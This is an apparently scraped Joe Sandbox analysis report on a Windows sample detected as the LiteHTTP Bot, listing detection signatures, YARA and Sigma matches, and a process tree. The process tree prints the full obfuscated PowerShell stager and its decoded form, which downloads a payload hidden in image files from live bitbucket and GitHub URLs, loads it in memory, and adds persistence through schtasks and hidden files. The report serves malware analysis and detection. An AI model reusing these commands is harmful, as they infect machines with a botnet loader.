Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3lhrJ4X.exe

Overview

General Information

Sample name:3lhrJ4X.exe
Analysis ID:1583964
MD5:21b5e69aec540eaace5aa6d588896218
SHA1:fcd64b005a42f69bfa94118b0cc92d0ddf06ca29
SHA256:fcbd0c268f201e76e18eebce0bbc6b063bc2fda1dcf4511c19fdc1287a73195e
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

LiteHTTP Bot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected LiteHTTP Bot
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • 3lhrJ4X.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\3lhrJ4X.exe" MD5: 21B5E69AEC540EAACE5AA6D588896218)
    • cmd.exe (PID: 7708 cmdline: cmd.exe /c 67784c48226c6.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7784 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7840 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$I$$9$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBT$HU$YgBz$HQ$cgBp$G4$Zw$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$s$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$g$C$$J$B0$GU$e$B0$C$$PQ$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$9$C$$RwBl$HQ$LQBD$G8$bQBw$HI$ZQBz$HM$ZQBk$EI$eQB0$GU$QQBy$HI$YQB5$C$$LQBi$Hk$d$Bl$EE$cgBy$GE$eQ$g$CQ$ZQBu$GM$V$Bl$Hg$d$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$GE$YQBh$GE$YQBh$HM$Z$Bt$GU$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$Jw$g$HQ$e$B0$C4$awBu$G4$YwBi$GI$c$$v$HM$Z$Bh$G8$b$Bu$Hc$bwBk$C8$ZgB3$HE$ZgB3$HI$ZQB3$C8$ZQB3$HE$cgB3$GY$dwBx$GY$LwBn$HI$bw$u$HQ$ZQBr$GM$dQBi$HQ$aQBi$Cc$L$$g$Cc$M$$n$Cw$I$$n$FM$d$Bh$HI$d$B1$H$$TgBh$G0$ZQ$n$Cw$I$$n$E0$cwBi$HU$aQBs$GQ$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • MSBuild.exe (PID: 7256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
              • schtasks.exe (PID: 7800 cmdline: "schtasks" /Query /TN "Msbuild" MD5: 48C2FE20575769DE916F48EF0676A965)
                • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7768 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "Msbuild" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
                • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 3756 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 3448 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 2104 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 6920 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 6928 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 8032 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 2112 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 7844 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 3732 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 3588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 3244 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 2088 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 6096 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 5080 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 8132 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • MSBuild.exe (PID: 7696 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MSBuild.exe (PID: 5440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.4118790717.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
    00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
      Process Memory Space: powershell.exe PID: 7840JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 7840INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x180a3:$b2: ::FromBase64String(
        • 0x17c550:$b2: ::FromBase64String(
        • 0x17e76:$b3: ::UTF8.GetString(
        • 0x6a66:$s1: -join
        • 0x111f22:$s1: -join
        • 0x325a9:$s3: reverse
        • 0x3dde7:$s3: reverse
        • 0x718be:$s3: reverse
        • 0x78513:$s3: reverse
        • 0x7a4fa:$s3: reverse
        • 0x85529:$s3: reverse
        • 0xea870:$s3: reverse
        • 0xeab5e:$s3: reverse
        • 0xeb278:$s3: reverse
        • 0xeba31:$s3: reverse
        • 0xf2b1c:$s3: reverse
        • 0xf2f36:$s3: reverse
        • 0xf3abe:$s3: reverse
        • 0xf476b:$s3: reverse
        • 0x1661cf:$s3: reverse
        • 0x170096:$s3: reverse
        Process Memory Space: powershell.exe PID: 8000JoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          8.2.MSBuild.exe.400000.0.unpackJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
            8.2.MSBuild.exe.400000.0.unpackMALWARE_Win_CoreBotDetects CoreBotditekSHen
            • 0x83ae:$v1_1: newtask
            • 0x6e4c:$v1_6: payload
            • 0x7019:$v1_7: DownloadFile
            • 0x7026:$v1_8: RemoveFile
            • 0x8360:$cnc1: &os=
            • 0x836a:$cnc2: &pv=
            • 0x8374:$cnc3: &ip=
            • 0x837e:$cnc4: &cn=
            • 0x8388:$cnc5: &lr=
            • 0x8392:$cnc6: &ct=
            • 0x839c:$cnc7: &bv=
            • 0x83be:$cnc8: &op=
            • 0x83cc:$cnc9: &td=
            • 0x83e0:$cnc10: &uni=
            6.2.powershell.exe.1d3bba895c8.2.unpackJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
              6.2.powershell.exe.1d3bba895c8.2.unpackMALWARE_Win_CoreBotDetects CoreBotditekSHen
              • 0x65ae:$v1_1: newtask
              • 0x504c:$v1_6: payload
              • 0x5219:$v1_7: DownloadFile
              • 0x5226:$v1_8: RemoveFile
              • 0x6560:$cnc1: &os=
              • 0x656a:$cnc2: &pv=
              • 0x6574:$cnc3: &ip=
              • 0x657e:$cnc4: &cn=
              • 0x6588:$cnc5: &lr=
              • 0x6592:$cnc6: &ct=
              • 0x659c:$cnc7: &bv=
              • 0x65be:$cnc8: &op=
              • 0x65cc:$cnc9: &td=
              • 0x65e0:$cnc10: &uni=
              6.2.powershell.exe.1d3bba895c8.2.raw.unpackJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                amsi64_8000.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Spreading

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;

                  System Summary

                  barindex
